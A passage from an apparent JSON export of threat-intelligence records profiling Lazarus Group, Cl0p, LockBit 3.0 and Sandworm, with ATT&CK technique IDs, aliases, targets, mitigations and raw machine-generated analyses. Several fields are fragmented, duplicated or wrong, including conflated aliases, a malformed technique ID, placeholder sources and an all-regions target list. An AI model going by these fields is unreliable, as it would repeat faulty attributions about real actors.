Theft\", \"Credential Harvesting\", \"Creating Botnets\", \"Disinformation\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [\"T1059\", \"T1203\", \"T1218\", \"T1053.005\", \"T1059.001\", \"T1047\", \"T1055.001\", \"T1053.005\", \"T1051\", \"T1110\", \"T1057\", \"T1124\", \"T1082\", \"T1021.001\", \"T1021.002\", \"T1021.004\", \"T1190\", \"T1204\", \"T1485\", \"T1491\", \"T1561\", \"T1589\", \"T1591\", \"T1593.001\", \"T1583\", \"T1584v\", \"T1587.002\", \"T1587.001\", \"T1585\", \"T1608\", \"T1189\", \"T1566\", \"T1078\", \"T1106\", \"T1098\", \"T1547.001\", \"T1547.009\", \"T1543.003\", \"T1574.002\", \"T1574.013\", \"T1542.003\", \"T1505.004\", \"T1134.002\", \"T1564.001\", \"T1562.004\", \"T1562.001\", \"T1070.003\", \"T1070.004\", \"T1070.006\", \"T1036\", \"T1027\", \"T1221\", \"T1497\", \"T1220\", \"T1087.002\", \"T1010\", \"T1622\", \"T1083\", \"T1046\", \"T1012\", \"T1534\", \"T1560\", \"T1005\", \"T1074\", \"T1056.001\", \"T1071.001\", \"T1132.001\", \"T1001.003\", \"T1573.001\", \"T1008\", \"T1105\", \"T1104\", \"T1571\", \"T1090\", \"T1102.002\", \"T1048.003\", \"T1041\", \"T1567.002\", \"T1491.001\", \"T1489\", \"T1529\", \"T1048.003\", \"T1557.001\", \"T1110.003\", \"T1078.002\", \"T1584\", \"T1562.003\", \"T1600.001\", \"T1134.001\", \"T1148.003\"], \"threat_actor_motives\": [\"Financial Gain\", \"Cyberwarfare\", \"Espionage\", \"Notoriety\"], \"threat_actor_resources\": [\"government\", \"organization\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"Hidden Cobra\", \"APT38\", \"Bluenoroff\", \"Guardians of Peace\", \"ZINC\", \"Zinc Team\", \"Sun Team\", \"Stardust Chollima\", \"APT37\", \"Lazarus\", \"Zinc\", \"DarkSeoul\", \"Operation Flame\", \"Operation Blockbuster\"], \"vulnerabilities\": [\"CVE-2018-4878\", \"Log4j Vulnerability\"], \"sources\": [\"Bank Info Security\", \"BleepingComputer\", \"CyberWire\", \"DarkReading\", \"InfoSecurity Magazine\", \"MITRE ATT&CK\", \"SC Media\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Lazarus Group\"], \"aliases\": [\"Hidden Cobra\", \"APT38\", \"Bluenoroff\", \"Guardians of Peace\", \"ZINC\", \"Zinc Team\", \"Sun Team\", \"Stardust Chollima\", \"APT37\", \"Lazarus\", \"Zinc\", \"DarkSeoul\", \"Operation Flame\", \"Operation Blockbuster\"], \"country_of_origin\": [\"KP\"], \"target_countries\": [\"US\", \"KR\", \"JP\", \"CN\", \"IN\", \"GB\", \"RU\", \"DE\", \"FR\", \"SA\", \"PK\", \"BG\"], \"target_regions\": [\"americas\", \"asia\", \"europe\", \"africa\", \"oceania\", \"eastern-asia\", \"southern-asia\", \"south-eastern-asia\", \"eastern-europe\", \"western-europe\"], \"threat_actor_overview\": [\"Lazarus Group is a North Korean state-sponsored cyber threat group that has been active since 2009. They have gained infamy for their involvement in major cyberattacks including the destructive wiper attack on Sony Pictures Entertainment in 2014. Lazarus Group has become a widely used term to encompass multiple groups\", \" and their activities pose financial losses\", \" national security concerns\", \" and the need for international collaboration to address this evolving cyber threat.\", \"Lazarus Group is a North Korean state-sponsored cyber threat group that has been active since 2009. They gained infamy for their involvement in major cyberattacks\", \" including the destructive attack on Sony Pictures Entertainment in 2014. Lazarus Group is known for its sophisticated techniques and expanding scope of targeting global organizations.\", \"Lazarus Group is a North Korean state-sponsored cyber threat group that has been active since 2009. They have gained infamy for their involvement in major cyberattacks\", \" including the Sony Pictures Entertainment attack in 2014. Lazarus Group has expanded their scope to target global organizations and developed sophisticated malware and techniques to evade detection.\", \"Lazarus Group\", \" also known as Hidden Cobra\", \" Guardians of Peace\", \" and ZINC\", \" is a North Korean state-sponsored cyber threat group. They have been active since 2009 and gained infamy for their involvement in major cyberattacks. Lazarus Group has expanded their scope to target global organizations\", \" developing sophisticated malware and techniques to evade detection.\", \"Lazarus Group is a North Korean state-sponsored cyber threat group. They have been active since 2009 and gained infamy for their involvement in major cyberattacks. Lazarus Group has been associated with various campaigns such as Operation Blockbuster\", \" Operation Flame\", \" and DarkSeoul. Initially focused on cryptocurrency-related targets\", \" they have now expanded their scope to target global organizations.\", \" a North Korean state-sponsored cyber threat group\", \" has been active since 2009 and gained infamy for their involvement in major cyberattacks\", \" including the destructive wiper attack on Sony Pictures Entertainment in 2014. They have been associated with various campaigns such as Operation Blockbuster\", \" and DarkSeoul. While differentiating North Korean cyber groups can be challenging\", \" Lazarus Group has become a widely used term to encompass multiple groups. Initially focused on cryptocurrency-related targets\", \" Lazarus Group has now expanded their scope to target global organizations\", \" developing sophisticated malware and techniques to evade detection. The implications of their activities include financial losses\", \" including the destructive wiper attack on Sony Pictures Entertainment in 2014. Lazarus Group has become a widely used term to encompass multiple groups. They have expanded their scope to target global organizations\", \" is a North Korean state-sponsored cyber threat group. They have been active since 2009 and have gained infamy for their involvement in major cyberattacks. Lazarus Group has targeted various industries and organizations globally.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Damage and Destruction\", \"Financial Theft\", \"Disruption of Service\", \"Espionage\", \"Information Theft\", \"Credential Harvesting\", \"Creating Botnets\", \"Disinformation\"], \"threat_actor_capabilities\": [\"T1059\", \"T1203\", \"T1218\", \"T1053.005\", \"T1059.001\", \"T1047\", \"T1055.001\", \"T1053.005\", \"T1051\", \"T1110\", \"T1057\", \"T1124\", \"T1082\", \"T1021.001\", \"T1021.002\", \"T1021.004\", \"T1190\", \"T1204\", \"T1485\", \"T1491\", \"T1561\", \"T1589\", \"T1591\", \"T1593.001\", \"T1583\", \"T1584v\", \"T1587.002\", \"T1587.001\", \"T1585\", \"T1608\", \"T1189\", \"T1566\", \"T1078\", \"T1106\", \"T1098\", \"T1547.001\", \"T1547.009\", \"T1543.003\", \"T1574.002\", \"T1574.013\", \"T1542.003\", \"T1505.004\", \"T1134.002\", \"T1564.001\", \"T1562.004\", \"T1562.001\", \"T1070.003\", \"T1070.004\", \"T1070.006\", \"T1036\", \"T1027\", \"T1221\", \"T1497\", \"T1220\", \"T1087.002\", \"T1010\", \"T1622\", \"T1083\", \"T1046\", \"T1012\", \"T1534\", \"T1560\", \"T1005\", \"T1074\", \"T1056.001\", \"T1071.001\", \"T1132.001\", \"T1001.003\", \"T1573.001\", \"T1008\", \"T1105\", \"T1104\", \"T1571\", \"T1090\", \"T1102.002\", \"T1048.003\", \"T1041\", \"T1567.002\", \"T1491.001\", \"T1489\", \"T1529\", \"T1048.003\", \"T1557.001\", \"T1110.003\", \"T1078.002\", \"T1584\", \"T1562.003\", \"T1600.001\", \"T1134.001\", \"T1148.003\"], \"threat_actor_motives\": [\"Financial Gain\", \"Cyberwarfare\", \"Espionage\", \"Notoriety\"], \"threat_actor_resources\": [\"government\", \"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [\"Monitor and Secure System Networks\", \"Monitor and Secure Active Directories\", \"Routinely Train and Test Staff on Internet Security\", \"Follow NIST standards on Password Safety\", \"Do NOT Grant Privileges Unnecessarily\", \"Create Secure Group Policies\", \" Monitor and Secure Active Directories\", \" Routinely Train and Test Staff on Internet Security\", \" Follow NIST standards on Password Safety\", \" Do NOT Grant Privileges Unnecessarily\", \" Create Secure Group Policies\"], \"attack_consequences\": [\"Data Loss\", \"Financial Loss\", \"Service Loss\", \"Data Termination\"], \"vulnerabilities\": [\"CVE-2018-4878\", \"Log4j Vulnerability\"], \"sources\": [\"Bank Info Security\", \"BleepingComputer\", \"CyberWire\", \"DarkReading\", \"InfoSecurity Magazine\", \"MITRE ATT&CK\", \"SC Media\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-08-31T19:57:31.249Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64f0f07e7b91c1f23e50f511"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-08-31T19:56:46.396Z"
      },
      "changes": [
        {
          "field": "threat_actor_intent",
          "previous_value": [
            "Damage and Destruction",
            "Financial Theft",
            "Disruption of Service",
            "Espionage",
            "Information Theft",
            "Credential Harvesting",
            "Creating Botnets",
            "Disinformation"
          ],
          "updated_value": [
            "Damage and Destruction",
            "Financial Theft",
            "Disruption of Service",
            "Espionage",
            "Information Theft",
            "Credential Harvesting"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f0f0607b91c1f23e50f510"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-08-31T19:56:16.512Z"
      },
      "changes": [
        {
          "field": "aliases",
          "previous_value": [
            "APT38",
            "APT37",
            "Lazarus"
          ],
          "updated_value": [
            "Lazarus"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f0f04c7b91c1f23e50f50f"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-08-31T19:55:56.306Z"
      },
      "changes": [
        {
          "field": "aliases",
          "previous_value": [
            "Hidden Cobra",
            "APT38",
            "Bluenoroff",
            "Guardians of Peace",
            "ZINC",
            "Zinc Team",
            "Sun Team",
            "Stardust Chollima",
            "APT37",
            "Lazarus",
            "Zinc",
            "DarkSeoul",
            "Operation Flame",
            "Operation Blockbuster"
          ],
          "updated_value": [
            "APT38",
            "APT37",
            "Lazarus"
          ]
        }
      ]
    }
  ],
  "threat_actor": "Lazarus Group"
},
{
  "_id": {
    "$oid": "64efa36d1dcf4a5cf045d950"
  },
  "report": {
    "$oid": "64efa34f638ee135e1dcb3cf"
  },
  "threat_actor_overview": "Clop ransomware is used by different threat groups and has shown its ability to change and adapt over time. It consistently targets crucial sectors such as healthcare,  finance,  technology,  cybersecurity,  and research labs. Clop has gained infamy for compromising high-profile organizations worldwide and has resulted in significant financial losses.",
  "aliases": [],
  "sources": [
    "Microsoft Threat Intelligence",
    "TrendMicro",
    "BleepingComputer",
    "malpedia",
    "Mitre ATT&CK"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Financial Theft",
    "Disruption of Service",
    "Damage and Destruction"
  ],
  "threat_actor_capabilities": [
    "T1106",
    "T1059.003",
    "T1140",
    "T1112",
    "T1562.001",
    "T1497.003",
    "T1027.002",
    "T1553.002",
    "T1218.007",
    "T1083",
    "T1135",
    "T1057",
    "T1518.001",
    "T1614.001",
    "T1486",
    "T1490",
    "T1489"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "strategic",
  "target_countries": [
    "US",
    "ES"
  ],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "Use up-to-date security to recognize and alert unauthorized registry modifications., Routinely train and test staff on internet security., Routinely backup data., Have strict group policies., Monitor active directories., Auditing Remote Access Tools., Implement Application Controls., Restrict the use of PowerShell., Review Domain Controllers, Servers, Workstations, and Active Directories., Disable receiving hyperlinks in emails., Label external emails., If possible, implement time-based access for user accounts.",
  "attack_consequences": "Financial Loss, Possible Termination of Data, Interruption of Service",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Clop\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Use up-to-date security to recognize and alert unauthorized registry modifications., Routinely train and test staff on internet security., Routinely backup data., Have strict group policies., Monitor active directories., Auditing Remote Access Tools., Implement Application Controls., Restrict the use of PowerShell., Review Domain Controllers, Servers, Workstations, and Active Directories., Disable receiving hyperlinks in emails., Label external emails., If possible, implement time-based access for user accounts.\", \"attack_consequences\": \"Financial Loss, Possible Termination of Data, Interruption of Service\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Clop ransomware is used by different threat groups and has shown its ability to change and adapt over time. It consistently targets crucial sectors such as healthcare,  finance,  technology,  cybersecurity,  and research labs. Clop has gained infamy for compromising high-profile organizations worldwide and has resulted in significant financial losses.\", \"target_countries\": [\"US\", \"ES\"], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [\"T1106\", \"T1059.003\", \"T1140\", \"T1112\", \"T1562.001\", \"T1497.003\", \"T1027.002\", \"T1553.002\", \"T1218.007\", \"T1083\", \"T1135\", \"T1057\", \"T1518.001\", \"T1614.001\", \"T1486\", \"T1490\", \"T1489\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Microsoft Threat Intelligence\", \"TrendMicro\", \"BleepingComputer\", \"malpedia\", \"Mitre ATT&CK\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Clop\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"US\", \"ES\"], \"target_regions\": [], \"threat_actor_overview\": [\"Clop ransomware is used by different threat groups and has shown its ability to change and adapt over time. It consistently targets crucial sectors such as healthcare\", \" finance\", \" technology\", \" cybersecurity\", \" and research labs. Clop has gained infamy for compromising high-profile organizations worldwide and has resulted in significant financial losses.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\"], \"threat_actor_capabilities\": [\"T1106\", \"T1059.003\", \"T1140\", \"T1112\", \"T1562.001\", \"T1497.003\", \"T1027.002\", \"T1553.002\", \"T1218.007\", \"T1083\", \"T1135\", \"T1057\", \"T1518.001\", \"T1614.001\", \"T1486\", \"T1490\", \"T1489\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [\"Use up-to-date security to recognize and alert unauthorized registry modifications.\", \"Routinely train and test staff on internet security.\", \"Routinely backup data.\", \"Have strict group policies.\", \"Monitor active directories.\", \"Auditing Remote Access Tools.\", \"Implement Application Controls.\", \"Restrict the use of PowerShell.\", \"Review Domain Controllers, Servers, Workstations, and Active Directories.\", \"Disable receiving hyperlinks in emails.\", \"Label external emails.\", \"If possible, implement time-based access for user accounts.\"], \"attack_consequences\": [\"Financial Loss\", \"Possible Termination of Data\", \"Interruption of Service\"], \"vulnerabilities\": [], \"sources\": [\"Microsoft Threat Intelligence\", \"TrendMicro\", \"BleepingComputer\", \"malpedia\", \"Mitre ATT&CK\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-08-31T19:49:31.953Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64efb1c3971bd398a8b674fa"
      },
      "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
      "updated_on": {
        "$date": "2023-08-30T21:16:51.839Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Clop",
          "updated_value": "Cl0p"
        },
        {
          "field": "threat_actor_sophistication",
          "previous_value": "none",
          "updated_value": "strategic"
        }
      ]
    }
  ],
  "threat_actor": "Cl0p"
},
{
  "_id": {
    "$oid": "64efb2ef2b77104f3ada0699"
  },
  "report": {
    "$oid": "64efb2ce971bd398a8b674fb"
  },
  "threat_actor_overview": "LockBit 3.0 is a financially motivated ransomware threat group that operates a Ransomware-as-a-Service (RaaS) service. They target both high-profile entities within critical infrastructure and conventional sectors,  aiming to establish a strong reputation and accumulate significant financial gains. LockBit 3.0 ranks third among the most prevalent ransomware groups., LockBit 3.0 is a financially motivated threat actor known for their stable ransomware operations. They target high-profile entities within critical infrastructure and conventional sectors,  aiming to establish a strong reputation. LockBit 3.0 has accumulated significant financial gains and operates as a Ransomware-as-a-Service (RaaS) offering., LockBit 3.0 is a financially motivated ransomware group. They target both high-profile entities within critical infrastructure and conventional sectors to establish a strong reputation. LockBit 3.0 has accumulated millions of dollars through their operations.",
  "aliases": [],
  "sources": [
    "Cyberwire",
    "Fortinet",
    "GBHackers",
    "HackRead",
    "Industrial Cyber",
    "LoginSoft Research",
    "Tidal Cyber",
    "Joint Cybersecurity Advisory"
  ],
  "country_of_origin": "unknown",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Financial Theft",
    "Disruption of Service",
    "Damage and Destruction",
    "Information Theft"
  ],
  "threat_actor_capabilities": [
    "T1059.003",
    "T1059.005",
    "T1059.006",
    "T1204.002",
    "T1547.004"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "IN",
    "US"
  ],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"LockBit 3.0\", \"country_of_origin\": \"unknown\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"LockBit 3.0 is a financially motivated ransomware threat group that operates a Ransomware-as-a-Service (RaaS) service. They target both high-profile entities within critical infrastructure and conventional sectors,  aiming to establish a strong reputation and accumulate significant financial gains. LockBit 3.0 ranks third among the most prevalent ransomware groups., LockBit 3.0 is a financially motivated threat actor known for their stable ransomware operations. They target high-profile entities within critical infrastructure and conventional sectors,  aiming to establish a strong reputation. LockBit 3.0 has accumulated significant financial gains and operates as a Ransomware-as-a-Service (RaaS) offering., LockBit 3.0 is a financially motivated ransomware group. They target both high-profile entities within critical infrastructure and conventional sectors to establish a strong reputation. LockBit 3.0 has accumulated millions of dollars through their operations.\", \"target_countries\": [\"IN\", \"US\"], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\", \"Information Theft\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [\"T1059.003\", \"T1059.005\", \"T1059.006\", \"T1204.002\", \"T1547.004\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Cyberwire\", \"Fortinet\", \"GBHackers\", \"HackRead\", \"Industrial Cyber\", \"LoginSoft Research\", \"Tidal Cyber\", \"Joint Cybersecurity Advisory\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"LockBit 3.0\"], \"aliases\": [], \"country_of_origin\": [\"unknown\"], \"target_countries\": [\"IN\", \"US\"], \"target_regions\": [\"Asia\", \"Americas\"], \"threat_actor_overview\": [\"LockBit 3.0 is a financially motivated ransomware threat group that operates a Ransomware-as-a-Service (RaaS) service. They target both high-profile entities within critical infrastructure and conventional sectors\", \" aiming to establish a strong reputation and accumulate significant financial gains. LockBit 3.0 ranks third among the most prevalent ransomware groups.\", \"LockBit 3.0 is a financially motivated threat actor known for their stable ransomware operations. They target high-profile entities within critical infrastructure and conventional sectors\", \" aiming to establish a strong reputation. LockBit 3.0 has accumulated significant financial gains and operates as a Ransomware-as-a-Service (RaaS) offering.\", \"LockBit 3.0 is a financially motivated ransomware group. They target both high-profile entities within critical infrastructure and conventional sectors to establish a strong reputation. LockBit 3.0 has accumulated millions of dollars through their operations.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\", \"Information Theft\"], \"threat_actor_capabilities\": [\"T1059.003\", \"T1059.005\", \"T1059.006\", \"T1204.002\", \"T1547.004\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"Cyberwire\", \"Fortinet\", \"GBHackers\", \"HackRead\", \"Industrial Cyber\", \"LoginSoft Research\", \"Tidal Cyber\", \"Joint Cybersecurity Advisory\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-08-31T19:51:13.145Z"
  },
  "approval_message": "",
  "change_log": [],
  "threat_actor": "LockBit 3.0"
},
{
  "_id": {
    "$oid": "64f0e9038e5924e56b041de3"
  },
  "report": {
    "$oid": "64f0e89f7b91c1f23e50f508"
  },
  "threat_actor_overview": "Sandworm is a threat actor known for targeting Android devices used by the Ukrainian military. It has been linked to the Russian GRU's Main Centre for Special Technologies GTsST., Sandworm is a threat actor known for using mobile malware called Infamous Chisel in campaigns targeting Android devices used by the Ukrainian military. It has been linked to the Russian GRU's Main Centre for Special Technologies GTsST., Sandworm,  linked to the Russian GRU's Main Centre for Special Technologies GTsST,  has been conducting a mobile malware campaign targeting Android devices used by the Ukrainian military. The malware,  known as Infamous Chisel,  enables persistent access to infected Android devices over the Tor network and exfiltrates victim information.,  also known as GRU Main Centre for Special Technologies GTsST,  is a threat actor with links to the Russian GRU. They have been identified as using a new mobile malware called Infamous Chisel in a campaign targeting Android devices used by the Ukrainian military., The Infamous Chisel threat actor exhibits low to medium sophistication and shows little regard for defense evasion or concealment of malicious activity. They target specific files and directory paths related to military applications and exfiltrate sensitive data., The Infamous Chisel threat actor has been identified as a low to medium sophistication group. They have developed components with little regard to defense evasion or concealment of malicious activity. The actor searches for specific files and directory paths related to military applications for exfiltration purposes.",
  "aliases": [
    "Russian GRU's Main Centre for Special Technologies GTsST",
    "GRU Main Centre for Special Technologies GTsST"
  ],
  "sources": [
    "UK National Cyber Security Centre (NCSC)",
    "U.S. National Security Agency (NSA)",
    "U.S. Cybersecurity and Infrastructure Security Agency (CISA)",
    "U.S. Federal Bureau of Investigation (FBI)",
    "New Zealand’s National Cyber Security Centre (NCSC-NZ)",
    "Canadian Centre for Cyber Security",
    "Australian Signals Directorate (ASD)",
    "Canadian Centre for Cyber Security (CSE)"
  ],
  "country_of_origin": "RU",
  "threat_actor_motives": [
    "Espionage",
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Espionage",
    "Information Theft"
  ],
  "threat_actor_capabilities": [
    "T1569",
    "T1398",
    "T1625",
    "T1626",
    "T1629",
    "T1406",
    "T1557",
    "T1634",
    "T1040",
    "T1420",
    "T1430",
    "T1418",
    "T1426",
    "T1422",
    "T1421",
    "T1533",
    "T1074.001",
    "T1114.001",
    "T1473",
    "T1521",
    "T1572",
    "T1219",
    "T1569: System Services",
    "T1398: Boot or Logon Initialization Scripts",
    "T1625: Hijack Execution Flow",
    "T1626: Abuse Elevation Control Mechanism",
    "T1629: Impair Defenses",
    "T1406: Obfuscated Files or Information",
    "T1557: Adversary-in-the-Middle",
    "T1634: Credentials from Password Stores",
    "T1040: Network Sniffing",
    "T1420: File and Directory Discovery",
    "T1430: Location Tracking",
    "T1418: Software Discovery",
    "T1426: System Information Discovery",
    "T1422: System Network Configuration Discovery",
    "T1421: System Network Connections Discovery",
    "T1533: Data from Local System",
    "T1074.001: Data Staged: Local Data Staging",
    "T1114.001: Email Collection: Local Email Collection",
    "T1473: Application Layer Protocol",
    "T1521: Encrypted Channel",
    "T1572: Protocol Tunnelling",
    "T1219: Remote Access Software",
    "T1489: Service Stop",
    "T1489",
    "T1020",
    "T1029",
    "T1573.001",
    "T1110.001",
    "T1057",
    "T1003",
    "T1090"
  ],
  "threat_actor_resources": [
    "government",
    "organization"
  ],
  "threat_actor_type": [
    "nation-state",
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "UA"
  ],
  "target_regions": [
    "eastern-europe"
  ],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [
    "CVE-2014-4114",
    "CVE-2017-0199"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Sandworm, Infamous Chisel\", \"country_of_origin\": \"RU, unknown\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Sandworm is a threat actor known for targeting Android devices used by the Ukrainian military. It has been linked to the Russian GRU's Main Centre for Special Technologies GTsST., Sandworm is a threat actor known for using mobile malware called Infamous Chisel in campaigns targeting Android devices used by the Ukrainian military. It has been linked to the Russian GRU's Main Centre for Special Technologies GTsST., Sandworm,  linked to the Russian GRU's Main Centre for Special Technologies GTsST,  has been conducting a mobile malware campaign targeting Android devices used by the Ukrainian military. The malware,  known as Infamous Chisel,  enables persistent access to infected Android devices over the Tor network and exfiltrates victim information.,  also known as GRU Main Centre for Special Technologies GTsST,  is a threat actor with links to the Russian GRU. They have been identified as using a new mobile malware called Infamous Chisel in a campaign targeting Android devices used by the Ukrainian military., The Infamous Chisel threat actor exhibits low to medium sophistication and shows little regard for defense evasion or concealment of malicious activity. They target specific files and directory paths related to military applications and exfiltrate sensitive data., The Infamous Chisel threat actor has been identified as a low to medium sophistication group. They have developed components with little regard to defense evasion or concealment of malicious activity. The actor searches for specific files and directory paths related to military applications for exfiltration purposes.\", \"target_countries\": [\"UA\"], \"target_regions\": [\"eastern-europe\", \"africa\", \"americas\", \"asia\", \"europe\", \"oceania\", \"eastern-africa\", \"middle-africa\", \"northern-africa\", \"southern-africa\", \"western-africa\", \"caribbean\", \"central-america\", \"latin-america-caribbean\", \"northern-america\", \"south-america\", \"central-asia\", \"eastern-asia\", \"southern-asia\", \"south-eastern-asia\", \"western-asia\", \"northern-europe\", \"southern-europe\", \"western-europe\", \"antarctica\", \"australia-new-zealand\", \"melanesia\", \"micronesia\", \"polynesia\"], \"target_populations\": [], \"threat_actor_intent\": [\"Espionage\", \"Information Theft\", \"Damage and Destruction\", \"Financial Theft\", \"Disruption of Service\", \"Disinformation\", \"Credential Harvesting\", \"Creating Botnets\", \"Cyber Stalking\", \"Resource Hijacking\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [\"T1569\", \"T1398\", \"T1625\", \"T1626\", \"T1629\", \"T1406\", \"T1557\", \"T1634\", \"T1040\", \"T1420\", \"T1430\", \"T1418\", \"T1426\", \"T1422\", \"T1421\", \"T1533\", \"T1074.001\", \"T1114.001\", \"T1473\", \"T1521\", \"T1572\", \"T1219\", \"T1569: System Services\", \"T1398: Boot or Logon Initialization Scripts\", \"T1625: Hijack Execution Flow\", \"T1626: Abuse Elevation Control Mechanism\", \"T1629: Impair Defenses\", \"T1406: Obfuscated Files or Information\", \"T1557: Adversary-in-the-Middle\", \"T1634: Credentials from Password Stores\", \"T1040: Network Sniffing\", \"T1420: File and Directory Discovery\", \"T1430: Location Tracking\", \"T1418: Software Discovery\", \"T1426: System Information Discovery\", \"T1422: System Network Configuration Discovery\", \"T1421: System Network Connections Discovery\", \"T1533: Data from Local System\", \"T1074.001: Data Staged: Local Data Staging\", \"T1114.001: Email Collection: Local Email Collection\", \"T1473: Application Layer Protocol\", \"T1521: Encrypted Channel\", \"T1572: Protocol Tunnelling\", \"T1219: Remote Access Software\", \"T1489: Service Stop\", \"T1489\", \"T1020\", \"T1029\", \"T1573.001\", \"T1110.001\", \"T1057\", \"T1003\", \"T1090\"], \"threat_actor_motives\": [\"Espionage\", \"Financial Gain\"], \"threat_actor_resources\": [\"government\", \"organization\"], \"threat_actor_type\": [\"nation-state\", \"unknown\"], \"aliases\": [\"Russian GRU's Main Centre for Special Technologies GTsST\", \"GRU Main Centre for Special Technologies GTsST\"], \"vulnerabilities\": [\"CVE-2014-4114\", \"CVE-2017-0199\"], \"sources\": [\"pdf-link-goes-here\", \"UK National Cyber Security Centre (NCSC)\", \"U.S. National Security Agency (NSA)\", \"U.S. Cybersecurity and Infrastructure Security Agency (CISA)\", \"U.S. Federal Bureau of Investigation (FBI)\", \"New Zealand\\u2019s National Cyber Security Centre (NCSC-NZ)\", \"Canadian Centre for Cyber Security\", \"Australian Signals Directorate (ASD)\", \"Canadian Centre for Cyber Security (CSE)\", \"https://www.example.com/threat-report\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Sandworm\", \"Infamous Chisel\"], \"aliases\": [\"Russian GRU's Main Centre for Special Technologies GTsST\", \"GRU Main Centre for Special Technologies GTsST\"], \"country_of_origin\": [\"RU\", \"unknown\"], \"target_countries\": [\"UA\"], \"target_regions\": [\"eastern-europe\", \"africa\", \"americas\", \"asia\", \"europe\", \"oceania\", \"eastern-africa\", \"middle-africa\", \"northern-africa\", \"southern-africa\", \"western-africa\", \"caribbean\", \"central-america\", \"latin-america-caribbean\", \"northern-america\", \"south-america\", \"central-asia\", \"eastern-asia\", \"southern-asia\", \"south-eastern-asia\", \"western-asia\", \"northern-europe\", \"southern-europe\", \"western-europe\", \"antarctica\", \"australia-new-zealand\", \"melanesia\", \"micronesia\", \"polynesia\"], \"threat_actor_overview\": [\"Sandworm is a threat actor known for targeting Android devices used by the Ukrainian military. It has been linked to the Russian GRU's Main Centre for Special Technologies GTsST.\", \"Sandworm is a threat actor known for using mobile malware called Infamous Chisel in campaigns targeting Android devices used by the Ukrainian military. It has been linked to the Russian GRU's Main Centre for Special Technologies GTsST.\", \"Sandworm\", \" linked to the Russian GRU's Main Centre for Special Technologies GTsST\", \" has been conducting a mobile malware campaign targeting Android devices used by 